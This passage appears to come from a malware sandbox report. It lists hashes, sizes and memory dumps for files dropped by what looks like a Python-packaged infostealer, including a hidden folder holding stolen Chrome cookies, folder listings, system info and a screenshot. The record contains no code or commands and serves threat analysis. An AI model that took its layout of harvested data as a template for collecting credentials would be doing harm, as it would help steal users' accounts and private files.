e058c833777e27d6b46a4aa4244f840a

SHA1
f3e144cee4fcaa09f7c0f7a2f1d124b3740f95e9

SHA256
72d221dc53979820e152436b1fff307ba55a9f8fd3b208645b6b52c3676dd64e

SHA512
29680311bd40ecd85db6d1727852005ab44c48475e80cc28a5eb2f7d879d28b6c0b43f11fce67432b4aa34da2c31804fce5dea2f2657854997c43702b67d4a85

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10642\unicodedata.pyd

Filesize
295KB

MD5
b5d228628223c9183288cfa2ec5ef18f

SHA1
f5deff24d909b3bc2d7b237a9a44bd968661f7de

SHA256
7ff8340c9a0c3e4253f84a7400f4d2f9b835c341928dad4310df391f2e7cb63a

SHA512
be37427e04d8d2d1e9a078f2cc2c779e038ffa4af08fa5f69533bbe040733874210a82db6aa6800885e982a83659d3c061290beb18dd498fc4299b34ce9a5b11

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q45oqcn4.bx0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\o1h3kgrm\o1h3kgrm.dll

Filesize
4KB

MD5
16d3b8cdf63707269af7cd90330c067e

SHA1
129cd7af7b5489058a5ef36ca4ca5f81db1e6155

SHA256
38f6bbfe7025bfc331d418786d9774372b03e1601b21a73cd2f055d4e6e9779d

SHA512
2d304874fe4aeddf936d63b2a5ca0d17ef5b29b41b59411b9112e9a65a726b7b906cd9298d914916c3d2a70af5732b8f3bc20c1239f49f930e8b4b6cfdf426bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
f038cdac9c84446ef8f12c2df1b0fcb6

SHA1
78136a322d3f438c586a7d7ddf2bcdf4b128d449

SHA256
3cf6921d391fe2206b8f21ec11250cd14037e9f43d584011649539f1e95bd3fa

SHA512
36c8a82395cd29b93e44a9c3b37ee07b04152bdf4a28b86d22c3eda23da32044719432912073c0b9a73830daf7b5400b5fe563d4adf95e20c5acc3d02cc5cdc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Desktop.txt

Filesize
592B

MD5
5bfdf93823d1bf79d0b08be7b761f7c8

SHA1
9db0e00b46a13325906188df25a52db83fa1bead

SHA256
c84993d5eb1e6ca317afe6be48b37dd06bc875eeb91edf04d74b38b9a66a6b11

SHA512
6514f8386b6069d940286f1625648562b3d547f21fea8682e39bde571167c2adb04ffde4b3e2b7fc37fa8fb476183db55f3679d027cb0325798c173e08efa248

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Documents.txt

Filesize
640B

MD5
c2f6f01d2ef4797b45c7f7aefd1ce77e

SHA1
12e30621ed8e159ff0e2266ceeb9fc3a54cd6786

SHA256
ad834ed0124fc6f9fc423a32eb40e426693524755d287437cc9ca888cb18b6cc

SHA512
03852ed57b3a6c6f017a4a18aae00f7dfbf6b1e2b0e09dbf67ee3ef6e65098eec23b5cbbe151808e904313fbf18941df8e69474b1058a0180ea4d26875296219

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Downloads.txt

Filesize
852B

MD5
d6ffe55a5cddc1fb3d503bc8f3de5838

SHA1
40b5c4c8242e53e64a7f77e5dc5c4f6dbf439284

SHA256
83169a024a063159b6ccca5170477200cd9045327a62f49eeae91cef688eacdf

SHA512
059814e4ea77e9a931651234c876d5a57738ad138f6d8985ff688d23e30afe5c471e333d285c2cd7b3e4d7508500f45b5ff7a47b1023862c10646ba28b14fdba

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Music.txt

Filesize
400B

MD5
a950a86d19ed9563e6a6ca268c685b22

SHA1
194515a9b104e35af985d0e773ac53d778fc18c9

SHA256
1ccb01633086235fb07c58c523744f4b58989674a8bfecdacdcdcb638e007ac5

SHA512
a077a4e5e6ba71547e08d5b94e0031d4741be4dcd565cebdcc4c65552f6e6e20c28b921500aa6e4c0b5c736a5a8f4f92d24ebe456ff49c823f95d95eae1aaec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Pictures.txt

Filesize
639B

MD5
79d29c9d49a0e5ebd9a4e2bd81009e41

SHA1
a3f71789c18723b2eda1b24a2251a0e5c54fd15a

SHA256
5b4c82d2fe579996b691f72757fe84e137543c84533881f6620264978bf8fb28

SHA512
ef7dd8e06a4f829428214e79900374b49a35681ded40fb03b85f65456f693fb882297baf1893884f3661600f200248cad04a88598bfdc69b79ef0fa2203851cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\Display (1).png

Filesize
424KB

MD5
b573db5c29d1d5e708f56974476d45f5

SHA1
ba1830ba476258076bc0851a8498085d64197546

SHA256
b1361054fdfca9f225a014989b06fe9dcf736009c071880394f266a25bb1dd22

SHA512
0a535325c2cb3506e4ac2643375324e102c2547518e444bccf4d3676ccfda64a408f06b2b426bbbcdb681bd75cb2a246e58f49893b7b0de87ed55f6b1cc9315b

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\System\System Info.txt

Filesize
2KB

MD5
77899b8d5da9bdd4efe5ae15d13aeebd

SHA1
f60dce2e0f3a2609d9454eb8a748f83f18a6f506

SHA256
82711652f2095402a3b7e5dcc7c7379c3c4eeae57e5a524ec6b32049040ae7e5

SHA512
5e0dcd9f9df98ebb99cf87f75ca51d42dfec74ea0161f4ec5500f73a0fc7cded4c8b66a2089bc554b07151c4c7f9d24adf769da06528bf169fe7753043d2166f

Download Submit
C:\Users\Admin\AppData\Local\Temp\      ‏\System\Task List.txt

Filesize
13KB

MD5
98b3880dea1336e2a9a625219ce8ce54

SHA1
ec51d744bd98751ee08418c7425f7953daa4b64e

SHA256
90db927570ffccc3ee7ddccd1e3c1ce1a0e906f9d37433011ce40bca23664a83

SHA512
a4ed8f46f51cd736130e0a59af91201bec3116870da8281ada7717cc670a4a3fc6e073c3d68343ab1d5525088c490a4b665571a2b18c7094935e6123ce4a4571

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o1h3kgrm\CSC405511FFCC9E4CB280A1321E520395.TMP

Filesize
652B

MD5
dec46313f60a99fc4c6e6259f2fb00b5

SHA1
6e5403732140c387b94046bbab5394e397dc5722

SHA256
ef4b58cff96d9856e3032be6e31c11a4ebba9bec034f8599442d300557aaf592

SHA512
fcd67ecd7edac29e5791c6d22b759cf8178ff4dc7a54946e1a16e367ac51663b024ee5bac5df1dac9b11ff61abdc7186e75ffc8b0d5b5af68fee8814c6f206c8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o1h3kgrm\o1h3kgrm.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o1h3kgrm\o1h3kgrm.cmdline

Filesize
607B

MD5
e59145462a105465fece25c26e35f776

SHA1
e3c2815152c8ff560ad8bd82f05a0f32ddb95f19

SHA256
c054f35eb78e88674932f4b548b7a5d3004d173c1260def869d94bcc5224660b

SHA512
0272ce94c7c9aa5cb50454e450712e4ee32abdda3e8589383663918f7ba78e61ec51defc1b74e33da9cc2877f380a3000c625297557cc5e8a544f641af2d4c91

Download Submit
memory/1464-91-0x000001BCF3000000-0x000001BCF3022000-memory.dmp

Filesize
136KB

Download
memory/3892-143-0x0000000075160000-0x0000000075199000-memory.dmp

Filesize
228KB

Download
memory/3892-139-0x0000000000230000-0x0000000000247000-memory.dmp

Filesize
92KB

Download
memory/3892-144-0x0000000000230000-0x0000000000247000-memory.dmp

Filesize
92KB

Download
memory/3964-159-0x000001B30A2F0000-0x000001B30A2F8000-memory.dmp

Filesize
32KB

Download
memory/3984-37-0x00007FFC120C0000-0x00007FFC120CF000-memory.dmp

Filesize
60KB

Download
memory/3984-72-0x00007FFC0AB40000-0x00007FFC0AB54000-memory.dmp

Filesize
80KB

Download
memory/3984-141-0x00007FFC0AC90000-0x00007FFC0ACBE000-memory.dmp

Filesize
184KB

Download
memory/3984-73-0x00007FFC0F550000-0x00007FFC0F55D000-memory.dmp

Filesize
52KB

Download
memory/3984-65-0x000001B1ED2A0000-0x000001B1ED618000-memory.dmp

Filesize
3.5MB

Download
memory/3984-104-0x00007FFC0ACF0000-0x00007FFC0AD13000-memory.dmp

Filesize
140KB

Download
memory/3984-138-0x000001B1ED2A0000-0x000001B1ED618000-memory.dmp

Filesize
3.5MB

Download
memory/3984-53-0x00007FFC0EBD0000-0x00007FFC0EBE9000-memory.dmp

Filesize
100KB

Download
memory/3984-48-0x00007FFC0ACF0000-0x00007FFC0AD13000-memory.dmp

Filesize
140KB

Download
memory/3984-126-0x00007FFC0EBD0000-0x00007FFC0EBE9000-memory.dmp

Filesize
100KB

Download
memory/3984-34-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp

Filesize
140KB

Download
memory/3984-76-0x00007FFC0A770000-0x00007FFC0A88C000-memory.dmp

Filesize
1.1MB

Download
memory/3984-172-0x00007FFC0A950000-0x00007FFC0AA08000-memory.dmp

Filesize
736KB

Download
memory/3984-39-0x00007FFC0EA10000-0x00007FFC0EA3D000-memory.dmp

Filesize
180KB

Download
memory/3984-33-0x00007FFC120D0000-0x00007FFC120E0000-memory.dmp

Filesize
64KB

Download
memory/3984-142-0x00007FFBFB650000-0x00007FFBFB9C8000-memory.dmp

Filesize
3.5MB

Download
memory/3984-46-0x00007FFC10690000-0x00007FFC106A9000-memory.dmp

Filesize
100KB

Download
memory/3984-47-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp

Filesize
1.5MB

Download
memory/3984-70-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp

Filesize
140KB

Download
memory/3984-96-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp

Filesize
1.5MB

Download
memory/3984-54-0x00007FFC0F750000-0x00007FFC0F75D000-memory.dmp

Filesize
52KB

Download
memory/3984-66-0x00007FFC0A950000-0x00007FFC0AA08000-memory.dmp

Filesize
736KB

Download
memory/3984-63-0x00007FFC0AC90000-0x00007FFC0ACBE000-memory.dmp

Filesize
184KB

Download
memory/3984-62-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp

Filesize
5.9MB

Download
memory/3984-64-0x00007FFBFB650000-0x00007FFBFB9C8000-memory.dmp

Filesize
3.5MB

Download
memory/3984-25-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp

Filesize
5.9MB

Download
memory/3984-286-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp

Filesize
140KB

Download
memory/3984-291-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp

Filesize
1.5MB

Download
memory/3984-284-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp

Filesize
5.9MB

Download